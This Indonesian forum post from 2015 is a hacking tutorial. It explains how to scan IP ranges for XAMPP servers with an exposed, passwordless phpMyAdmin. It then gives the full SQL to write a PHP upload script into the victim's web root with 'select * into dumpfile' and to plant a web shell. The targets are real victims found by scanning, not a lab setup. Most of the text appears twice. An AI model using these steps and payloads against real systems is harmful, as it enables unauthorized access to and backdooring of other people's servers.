11-11-2015, 01:10 AM
Selamat malam all member IBT, berawal dari praktek tutorial di trheadnya kang @sonyrimawan di http://www.indonesianbacktrack.or.id/for...-5981.html yang hasilnya g menyenangkan bagi ane ( karna ane gagal ) upload failed mulu ....
Ane brangkat ke warung ngutang rokok ama kopi buat temen begindang ... eh begadang maksudnya ....
Yang membuat ane penasara , toh udah masuk ke phpmyadmin masa g bisa ngapa2en ... :3 ( waktu itu ane merasa sedih )
Ane siapin peralatan tempur, berbekalkan sedikit pengetahuan dari install cms di localhost ane bulatkan tekat untuk BISA ...
Peralatan tambahan yang ane gunain :
Angry Ip Scanner
Sedikit Script
Shell Backdoor (Disini ane menggunkana shell 3CArmy)
Oke .... pertama kita cari dulu targetnya menggunakan Anggry Ip Scanner :
Set Anggry Ip Scannernya seperti gambar di bawah ini :
Menu tools >>> Preferences >> Pada tab port tambahkan port yg akan kita scan
berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya ane ane buat begindang
kemudian pada tab display pilih yang host with open port only
selanjutnya balik lagi pada menu tool >>> Fetchers
Pindahkan web detect ke sebelah kiri seperti di gambar
kemudian scan dan cari yg seperti ini :
yap .. yang port apachenya open tentunya , karna dari situlah kita masuk
NB : Tidak semua juga yang bisa , ada yg phpmyadminnya d password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo g salah )
setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc )
oke , disini kita mulai bermain dengan comand sql nya ...
pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan
NB : userform adalah nama database yang ane buat
Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand :
klik Go
NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang)
selanjutnya kita cek basedir nya dimana dengan comand :
pada contoh ini ada di C:\xampp\mysql\data\
artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs
oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini :
itu adalah script buat ngupload file backdoor kita nantinya ...
jika sukses maka akan muncul seperti ini :
Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand :
NB:
C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini )
upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya
from user = from (nama tabel)
Kemudian klik Go
coba buka urlnya : victimip/upload.php
terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php
Maaf untuk beberapa step terahir g ada gambarnya dikarnakan target ane udah offline . jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya...
Jika ada yang kurang jelas monggo tanyain ....
Tutorial Created by Black-Ink ...
Salam
Ane brangkat ke warung ngutang rokok ama kopi buat temen begindang ... eh begadang maksudnya ....
Yang membuat ane penasara , toh udah masuk ke phpmyadmin masa g bisa ngapa2en ... :3 ( waktu itu ane merasa sedih )
Ane siapin peralatan tempur, berbekalkan sedikit pengetahuan dari install cms di localhost ane bulatkan tekat untuk BISA ...
Peralatan tambahan yang ane gunain :
Angry Ip Scanner
Sedikit Script
Shell Backdoor (Disini ane menggunkana shell 3CArmy)
Oke .... pertama kita cari dulu targetnya menggunakan Anggry Ip Scanner :
Set Anggry Ip Scannernya seperti gambar di bawah ini :
Menu tools >>> Preferences >> Pada tab port tambahkan port yg akan kita scan
berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya ane ane buat begindang
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_12_05.png]](http://s17.postimg.org/vt9sazd9b/Screenshot_from_2015_11_10_23_12_05.png)
kemudian pada tab display pilih yang host with open port only
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_14_29.png]](http://s8.postimg.org/lkg2hrm4l/Screenshot_from_2015_11_10_23_14_29.png)
selanjutnya balik lagi pada menu tool >>> Fetchers
Pindahkan web detect ke sebelah kiri seperti di gambar
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_22_32.png]](http://s7.postimg.org/o20ndzpej/Screenshot_from_2015_11_10_23_22_32.png)
![[Image: Screenshot_from_2015_11_10_23_20_10.png]](http://s29.postimg.org/nq2z2hmg7/Screenshot_from_2015_11_10_23_20_10.png)
kemudian scan dan cari yg seperti ini :
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_27_31.png]](http://s15.postimg.org/t52gov9wr/Screenshot_from_2015_11_10_23_27_31.png)
yap .. yang port apachenya open tentunya , karna dari situlah kita masuk
NB : Tidak semua juga yang bisa , ada yg phpmyadminnya d password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo g salah )
setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc )
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_32_00.png]](http://s13.postimg.org/44sfa42dz/Screenshot_from_2015_11_10_23_32_00.png)
oke , disini kita mulai bermain dengan comand sql nya ...
pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan
Quote:create database userform
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_45_01.png]](http://s1.postimg.org/aqa9uw6lb/Screenshot_from_2015_11_10_23_45_01.png)
Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand :
Quote:CREATE TABLE `userform`.`user` (
`form` longtext not null
) ENGINE = MYISAM ;
klik Go
NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang)
selanjutnya kita cek basedir nya dimana dengan comand :
Quote:select @@datadir
pada contoh ini ada di C:\xampp\mysql\data\
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_53_59.png]](http://s7.postimg.org/pq9g3hyzf/Screenshot_from_2015_11_10_23_53_59.png)
artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs
oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini :
Quote:INSERT INTO `userform`.`user` (
`form`
)
VALUES (
'<title>Upload File</title>
<style type="text/css">
<!--
body,td,th {
color: #0F0;
}
body {
background-color: #999;
}
-->
</style><p>
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<p>
<strong>
<?php
if ($_FILES[''file''] != '''') {
copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');
}else {
die(''Silahkan pilih file'');
}
?>
File berhasil diupload:<br />
Keterangan File:<br />
Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />
Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />
Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>
'
);
itu adalah script buat ngupload file backdoor kita nantinya ...
jika sukses maka akan muncul seperti ini :
Spoiler! :
![[Image: Screenshot_from_2015_11_10_23_59_10.png]](http://s7.postimg.org/ggbkok9cr/Screenshot_from_2015_11_10_23_59_10.png)
Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand :
Quote:select * into dumpfile 'C:/xampp/htdocs/upload.php' from user
NB:
C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini )
upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya
from user = from (nama tabel)
Kemudian klik Go
coba buka urlnya : victimip/upload.php
terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php
Maaf untuk beberapa step terahir g ada gambarnya dikarnakan target ane udah offline . jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya...
Jika ada yang kurang jelas monggo tanyain ....
Tutorial Created by Black-Ink ...
Salam
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga 
